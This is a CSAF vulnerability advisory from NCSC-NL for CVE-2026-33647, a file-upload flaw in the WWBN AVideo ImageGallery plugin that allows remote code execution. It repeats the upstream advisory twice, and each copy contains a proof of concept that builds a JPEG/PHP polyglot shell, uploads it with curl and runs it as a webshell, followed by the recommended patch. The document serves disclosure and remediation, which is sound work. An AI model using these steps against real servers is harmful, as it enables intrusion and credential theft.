{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-33647", "tracking": { "current_release_date": "2026-03-25T18:43:33.743965Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-33647", "initial_release_date": "2026-03-24T10:54:06.472368Z", "revision_history": [ { "date": "2026-03-24T10:54:06.472368Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (2).| CWES updated (1)." }, { "date": "2026-03-24T10:54:11.264825Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-24T13:50:56.147187Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-24T13:51:06.547418Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-03-24T20:53:10.793802Z", "number": "5", "summary": "Unknown change." }, { "date": "2026-03-24T21:37:19.939906Z", "number": "6", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-24T21:37:32.741126Z", "number": "7", "summary": "NCSC Score updated." }, { "date": "2026-03-25T18:26:38.506796Z", "number": "8", "summary": "Products connected (1).| Product Identifiers created (1).| Exploits created (1)." }, { "date": "2026-03-25T18:26:45.316824Z", "number": "9", "summary": "NCSC Score updated." }, { "date": "2026-03-25T18:33:15.426561Z", "number": "10", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (18).| Product Identifiers created (17).| References created (3).| CWES updated (1)." }, { "date": "2026-03-25T18:42:38.883455Z", "number": "11", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)." }, { "date": "2026-03-25T18:42:48.050675Z", "number": "12", "summary": "NCSC Score updated." } ], "status": "interim", "version": "12" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<=26.0", "product": { "name": "vers:unknown/<=26.0", "product_id": "CSAFPID-5893889", "product_identification_helper": { "cpe": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*" } } } ], "category": "product_name", "name": "AVideo" }, { "branches": [ { "category": "product_version_range", "name": "vers:unknown/10.4", "product": { "name": "vers:unknown/10.4", "product_id": "CSAFPID-5656122", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@10.4" } } }, { "category": "product_version_range", "name": "vers:unknown/10.8", "product": { "name": "vers:unknown/10.8", "product_id": "CSAFPID-5656123", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@10.8" } } }, { "category": "product_version_range", "name": "vers:unknown/11", "product": { "name": "vers:unknown/11", "product_id": "CSAFPID-5656124", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11" } } }, { "category": "product_version_range", "name": "vers:unknown/11.1", "product": { "name": "vers:unknown/11.1", "product_id": "CSAFPID-5656125", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11.1" } } }, { "category": "product_version_range", "name": "vers:unknown/11.1.1", "product": { "name": "vers:unknown/11.1.1", "product_id": "CSAFPID-5656126", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11.1.1" } } }, { "category": "product_version_range", "name": "vers:unknown/11.5", "product": { "name": "vers:unknown/11.5", "product_id": "CSAFPID-5656127", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11.5" } } }, { "category": "product_version_range", "name": "vers:unknown/11.6", "product": { "name": "vers:unknown/11.6", "product_id": "CSAFPID-5656128", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11.6" } } }, { "category": "product_version_range", "name": "vers:unknown/12.4", "product": { "name": "vers:unknown/12.4", "product_id": "CSAFPID-5656129", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@12.4" } } }, { "category": "product_version_range", "name": "vers:unknown/14.3", "product": { "name": "vers:unknown/14.3", "product_id": "CSAFPID-5656130", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@14.3" } } }, { "category": "product_version_range", "name": "vers:unknown/14.3.1", "product": { "name": "vers:unknown/14.3.1", "product_id": "CSAFPID-5656131", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@14.3.1" } } }, { "category": "product_version_range", "name": "vers:unknown/14.4", "product": { "name": "vers:unknown/14.4", "product_id": "CSAFPID-5656132", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@14.4" } } }, { "category": "product_version_range", "name": "vers:unknown/18.0", "product": { "name": "vers:unknown/18.0", "product_id": "CSAFPID-5656133", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@18.0" } } }, { "category": "product_version_range", "name": "vers:unknown/21.0", "product": { "name": "vers:unknown/21.0", "product_id": "CSAFPID-5721197", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@21.0" } } }, { "category": "product_version_range", "name": "vers:unknown/22.0", "product": { "name": "vers:unknown/22.0", "product_id": "CSAFPID-5772271", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@22.0" } } }, { "category": "product_version_range", "name": "vers:unknown/24.0", "product": { "name": "vers:unknown/24.0", "product_id": "CSAFPID-5772272", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@24.0" } } }, { "category": "product_version_range", "name": "vers:unknown/25.0", "product": { "name": "vers:unknown/25.0", "product_id": "CSAFPID-5840723", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@25.0" } } }, { "category": "product_version_range", "name": "vers:unknown/26.0", "product": { "name": "vers:unknown/26.0", "product_id": "CSAFPID-5878928", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@26.0" } } }, { "category": "product_version_range", "name": "vers:unknown/>=0|<=26.0", "product": { "name": "vers:unknown/>=0|<=26.0", "product_id": "CSAFPID-5878929" } } ], "category": "product_name", "name": "avideo" } ], "category": "vendor", "name": "WWBN" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-33647", "cwe": { "id": "CWE-434", "name": "Unrestricted Upload of File with Dangerous Type" }, "notes": [ { "category": "description", "text": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `ImageGallery::saveFile()` method validates uploaded file content using `finfo` MIME type detection but derives the saved filename extension from the user-supplied original filename without an allowlist check. An attacker can upload a polyglot file (valid JPEG magic bytes followed by PHP code) with a `.php` extension. The MIME check passes, but the file is saved as an executable `.php` file in a web-accessible directory, achieving Remote Code Execution. Commit 345a8d3ece0ad1e1b71a704c1579cbf885d8f3ae contains a patch.", "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33647.json" }, { "category": "description", "text": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `ImageGallery::saveFile()` method validates uploaded file content using `finfo` MIME type detection but derives the saved filename extension from the user-supplied original filename without an allowlist check. An attacker can upload a polyglot file (valid JPEG magic bytes followed by PHP code) with a `.php` extension. The MIME check passes, but the file is saved as an executable `.php` file in a web-accessible directory, achieving Remote Code Execution. Commit 345a8d3ece0ad1e1b71a704c1579cbf885d8f3ae contains a patch.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33647" }, { "category": "description", "text": "## Summary\n\nThe `ImageGallery::saveFile()` method validates uploaded file content using `finfo` MIME type detection but derives the saved filename extension from the user-supplied original filename without an allowlist check. An attacker can upload a polyglot file (valid JPEG magic bytes followed by PHP code) with a `.php` extension. The MIME check passes, but the file is saved as an executable `.php` file in a web-accessible directory, achieving Remote Code Execution.\n\n## Details\n\nThe vulnerability exists in `plugin/ImageGallery/ImageGallery.php` in the `saveFile()` method:\n\n```php\n// plugin/ImageGallery/ImageGallery.php:80-108\nstatic function saveFile($file, $videos_id)\n{\n $allowedMimeTypes = ['image/jpeg', 'image/webp', 'image/gif', 'image/png', 'video/mp4'];\n $directory = self::getImageDir($videos_id);\n\n // MIME check on file CONTENT — bypassable with polyglot\n $finfo = new finfo(FILEINFO_MIME_TYPE);\n $fileType = $finfo->file($file['tmp_name']);\n\n if (in_array($fileType, $allowedMimeTypes)) {\n // Extension from attacker-controlled filename — NO allowlist\n $extension = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));\n do {\n $newFilename = uniqid() . '.' . $extension;\n $newFilePath = $directory . $newFilename;\n } while (file_exists($newFilePath));\n\n move_uploaded_file($file['tmp_name'], $newFilePath);\n // ...\n }\n}\n```\n\n**Root cause:** Line 93 extracts the extension from the user-supplied `$file['name']` and uses it directly in the saved filename. There is no check against an allowlist of safe extensions (e.g., `jpg`, `png`, `gif`, `webp`, `mp4`).\n\n**Why the MIME check is insufficient:** PHP's `finfo` with `FILEINFO_MIME_TYPE` inspects file content magic bytes. A file starting with JPEG magic bytes (`\\xff\\xd8\\xff\\xe0`) is identified as `image/jpeg` regardless of trailing content. Appending PHP code after the JPEG header creates a polyglot that passes the MIME check but executes as PHP when requested via the web server.\n\n**Why no server-level protection exists:** The root `.htaccess` at line 73 blocks dangerous extensions but uses the pattern `php[a-z0-9]+` — which matches `.php5`, `.phtml`, `.phar`, etc., but intentionally does **not** match plain `.php` (since the application itself requires PHP execution). There is no `.htaccess` in the `videos/` directory to disable PHP execution in the upload target.\n\n**Upload path:** Files are saved to `videos/{videoFilename}/ImageGallery/{uniqid}.php` — directly accessible via the web server.\n\nThe upload endpoint at `plugin/ImageGallery/upload.json.php` requires:\n1. The ImageGallery plugin to be enabled (line 6-8)\n2. An authenticated user (line 10-12)\n3. The user must have manage permission on the video (line 18-20) — video owner or admin\n\nThe response at line 27 calls `listFiles()` which returns the full URL of each uploaded file, giving the attacker the exact path to their webshell.\n\n## PoC\n\n**Prerequisites:** Authenticated AVideo user account that owns at least one Image or Gallery type video.\n\n**Step 1: Create a polyglot PHP/JPEG file**\n```bash\nprintf '\\xff\\xd8\\xff\\xe0\\x00\\x10JFIF' > shell.php\necho '' >> shell.php\n```\n\n**Step 2: Verify it passes finfo detection**\n```bash\nfile --mime-type shell.php\n# Expected output: shell.php: image/jpeg\n```\n\n**Step 3: Upload via ImageGallery endpoint**\n```bash\ncurl -b 'PHPSESSID=' \\\n -F \"upl=@shell.php;filename=shell.php\" \\\n 'https://target/plugin/ImageGallery/upload.json.php?videos_id='\n```\n\n**Expected response:**\n```json\n{\n \"videos_id\": \"123\",\n \"saveFile\": true,\n \"error\": false,\n \"list\": [\n {\n \"base\": \"67890abcdef12.php\",\n \"type\": \"image/jpeg\",\n \"url\": \"https://target/videos/video_filename/ImageGallery/67890abcdef12.php\"\n }\n ]\n}\n```\n\n**Step 4: Execute the webshell**\n```bash\ncurl 'https://target/videos/video_filename/ImageGallery/67890abcdef12.php?c=id'\n# Expected output: uid=33(www-data) gid=33(www-data) groups=33(www-data)\n```\n\n## Impact\n\nAn authenticated user with edit permission on any Image/Gallery video can achieve **Remote Code Execution** as the web server user. This allows:\n\n- Reading sensitive configuration files (database credentials in `videos/configuration.php`)\n- Full database access via the database credentials\n- Reading/modifying/deleting any file accessible to the web server process\n- Lateral movement within the server's network\n- Potential privilege escalation depending on server configuration\n\nAny AVideo instance with the ImageGallery plugin enabled and user registration open is vulnerable. Since regular (non-admin) users can exploit this against their own videos, the barrier to exploitation is low.\n\n## Recommended Fix\n\nAdd an extension allowlist check in `saveFile()` immediately after extracting the extension. The extension should be validated against the same set of types as the MIME allowlist:\n\n```php\n// plugin/ImageGallery/ImageGallery.php — in saveFile(), after line 93\nstatic function saveFile($file, $videos_id)\n{\n $allowedMimeTypes = ['image/jpeg', 'image/webp', 'image/gif', 'image/png', 'video/mp4'];\n+ $allowedExtensions = ['jpg', 'jpeg', 'webp', 'gif', 'png', 'mp4'];\n\n $directory = self::getImageDir($videos_id);\n\n $finfo = new finfo(FILEINFO_MIME_TYPE);\n $fileType = $finfo->file($file['tmp_name']);\n\n if (in_array($fileType, $allowedMimeTypes)) {\n $extension = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));\n+ if (!in_array($extension, $allowedExtensions)) {\n+ return false;\n+ }\n do {\n $newFilename = uniqid() . '.' . $extension;\n```\n\nAdditionally, as defense-in-depth, add a `.htaccess` file to the `videos/` directory to disable PHP execution:\n\n```apache\n# videos/.htaccess\nphp_flag engine off\n\n Require all denied\n\n```", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-wxjw-phj6-g75w.json?alt=media" }, { "category": "description", "text": "## Summary\n\nThe `ImageGallery::saveFile()` method validates uploaded file content using `finfo` MIME type detection but derives the saved filename extension from the user-supplied original filename without an allowlist check. An attacker can upload a polyglot file (valid JPEG magic bytes followed by PHP code) with a `.php` extension. The MIME check passes, but the file is saved as an executable `.php` file in a web-accessible directory, achieving Remote Code Execution.\n\n## Details\n\nThe vulnerability exists in `plugin/ImageGallery/ImageGallery.php` in the `saveFile()` method:\n\n```php\n// plugin/ImageGallery/ImageGallery.php:80-108\nstatic function saveFile($file, $videos_id)\n{\n $allowedMimeTypes = ['image/jpeg', 'image/webp', 'image/gif', 'image/png', 'video/mp4'];\n $directory = self::getImageDir($videos_id);\n\n // MIME check on file CONTENT — bypassable with polyglot\n $finfo = new finfo(FILEINFO_MIME_TYPE);\n $fileType = $finfo->file($file['tmp_name']);\n\n if (in_array($fileType, $allowedMimeTypes)) {\n // Extension from attacker-controlled filename — NO allowlist\n $extension = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));\n do {\n $newFilename = uniqid() . '.' . $extension;\n $newFilePath = $directory . $newFilename;\n } while (file_exists($newFilePath));\n\n move_uploaded_file($file['tmp_name'], $newFilePath);\n // ...\n }\n}\n```\n\n**Root cause:** Line 93 extracts the extension from the user-supplied `$file['name']` and uses it directly in the saved filename. There is no check against an allowlist of safe extensions (e.g., `jpg`, `png`, `gif`, `webp`, `mp4`).\n\n**Why the MIME check is insufficient:** PHP's `finfo` with `FILEINFO_MIME_TYPE` inspects file content magic bytes. A file starting with JPEG magic bytes (`\\xff\\xd8\\xff\\xe0`) is identified as `image/jpeg` regardless of trailing content. Appending PHP code after the JPEG header creates a polyglot that passes the MIME check but executes as PHP when requested via the web server.\n\n**Why no server-level protection exists:** The root `.htaccess` at line 73 blocks dangerous extensions but uses the pattern `php[a-z0-9]+` — which matches `.php5`, `.phtml`, `.phar`, etc., but intentionally does **not** match plain `.php` (since the application itself requires PHP execution). There is no `.htaccess` in the `videos/` directory to disable PHP execution in the upload target.\n\n**Upload path:** Files are saved to `videos/{videoFilename}/ImageGallery/{uniqid}.php` — directly accessible via the web server.\n\nThe upload endpoint at `plugin/ImageGallery/upload.json.php` requires:\n1. The ImageGallery plugin to be enabled (line 6-8)\n2. An authenticated user (line 10-12)\n3. The user must have manage permission on the video (line 18-20) — video owner or admin\n\nThe response at line 27 calls `listFiles()` which returns the full URL of each uploaded file, giving the attacker the exact path to their webshell.\n\n## PoC\n\n**Prerequisites:** Authenticated AVideo user account that owns at least one Image or Gallery type video.\n\n**Step 1: Create a polyglot PHP/JPEG file**\n```bash\nprintf '\\xff\\xd8\\xff\\xe0\\x00\\x10JFIF' > shell.php\necho '' >> shell.php\n```\n\n**Step 2: Verify it passes finfo detection**\n```bash\nfile --mime-type shell.php\n# Expected output: shell.php: image/jpeg\n```\n\n**Step 3: Upload via ImageGallery endpoint**\n```bash\ncurl -b 'PHPSESSID=' \\\n -F \"upl=@shell.php;filename=shell.php\" \\\n 'https://target/plugin/ImageGallery/upload.json.php?videos_id='\n```\n\n**Expected response:**\n```json\n{\n \"videos_id\": \"123\",\n \"saveFile\": true,\n \"error\": false,\n \"list\": [\n {\n \"base\": \"67890abcdef12.php\",\n \"type\": \"image/jpeg\",\n \"url\": \"https://target/videos/video_filename/ImageGallery/67890abcdef12.php\"\n }\n ]\n}\n```\n\n**Step 4: Execute the webshell**\n```bash\ncurl 'https://target/videos/video_filename/ImageGallery/67890abcdef12.php?c=id'\n# Expected output: uid=33(www-data) gid=33(www-data) groups=33(www-data)\n```\n\n## Impact\n\nAn authenticated user with edit permission on any Image/Gallery video can achieve **Remote Code Execution** as the web server user. This allows:\n\n- Reading sensitive configuration files (database credentials in `videos/configuration.php`)\n- Full database access via the database credentials\n- Reading/modifying/deleting any file accessible to the web server process\n- Lateral movement within the server's network\n- Potential privilege escalation depending on server configuration\n\nAny AVideo instance with the ImageGallery plugin enabled and user registration open is vulnerable. Since regular (non-admin) users can exploit this against their own videos, the barrier to exploitation is low.\n\n## Recommended Fix\n\nAdd an extension allowlist check in `saveFile()` immediately after extracting the extension. The extension should be validated against the same set of types as the MIME allowlist:\n\n```php\n// plugin/ImageGallery/ImageGallery.php — in saveFile(), after line 93\nstatic function saveFile($file, $videos_id)\n{\n $allowedMimeTypes = ['image/jpeg', 'image/webp', 'image/gif', 'image/png', 'video/mp4'];\n+ $allowedExtensions = ['jpg', 'jpeg', 'webp', 'gif', 'png', 'mp4'];\n\n $directory = self::getImageDir($videos_id);\n\n $finfo = new finfo(FILEINFO_MIME_TYPE);\n $fileType = $finfo->file($file['tmp_name']);\n\n if (in_array($fileType, $allowedMimeTypes)) {\n $extension = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));\n+ if (!in_array($extension, $allowedExtensions)) {\n+ return false;\n+ }\n do {\n $newFilename = uniqid() . '.' . $extension;\n```\n\nAdditionally, as defense-in-depth, add a `.htaccess` file to the `videos/` directory to disable PHP execution:\n\n```apache\n# videos/.htaccess\nphp_flag engine off\n\n Require all denied\n\n```", "title": "github - https://api.github.com/advisories/GHSA-wxjw-phj6-g75w" }, { "category": "other", "text": "0.00209", "title": "EPSS" }, { "category": "other", "text": "3.2", "title": "NCSC Score" }, { "category": "other", "text": "Is related to CWE-434 (Unrestricted Upload of File with Dangerous Type), Is related to (a version of) an uncommon product, The value of the most recent CVSS (V3) score, There is exploit data available from source Nvd", "title": "NCSC Score top decreasing factors" } ], "product_status": { "known_affected": [ "CSAFPID-5893889", "CSAFPID-5656122", "CSAFPID-5656123", "CSAFPID-5656124", "CSAFPID-5656125", "CSAFPID-5656126", "CSAFPID-5656127", "CSAFPID-5656128", "CSAFPID-5656129", "CSAFPID-5656130", "CSAFPID-5656131", "CSAFPID-5656132", "CSAFPID-5656133", "CSAFPID-5721197", "CSAFPID-5772271", "CSAFPID-5772272", "CSAFPID-5840723", "CSAFPID-5878928", "CSAFPID-5878929" ] }, "references": [ { "category": "external", "summary": "Source - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33647.json" }, { "category": "external", "summary": "Source - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33647" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-wxjw-phj6-g75w.json?alt=media" }, { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-wxjw-phj6-g75w" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-wxjw-phj6-g75w" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/WWBN/AVideo/commit/345a8d3ece0ad1e1b71a704c1579cbf885d8f3ae" }, { "category": "external", "summary": "Reference - github; osv", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33647" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-wxjw-phj6-g75w" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH" }, "products": [ "CSAFPID-5656122", "CSAFPID-5656123", "CSAFPID-5656124", "CSAFPID-5656125", "CSAFPID-5656126", "CSAFPID-5656127", "CSAFPID-5656128", "CSAFPID-5656129", "CSAFPID-5656130", "CSAFPID-5656131", "CSAFPID-5656132", "CSAFPID-5656133", "CSAFPID-5721197", "CSAFPID-5772271", "CSAFPID-5772272", "CSAFPID-5840723", "CSAFPID-5878928", "CSAFPID-5878929", "CSAFPID-5893889" ] } ], "title": "CVE-2026-33647" } ] }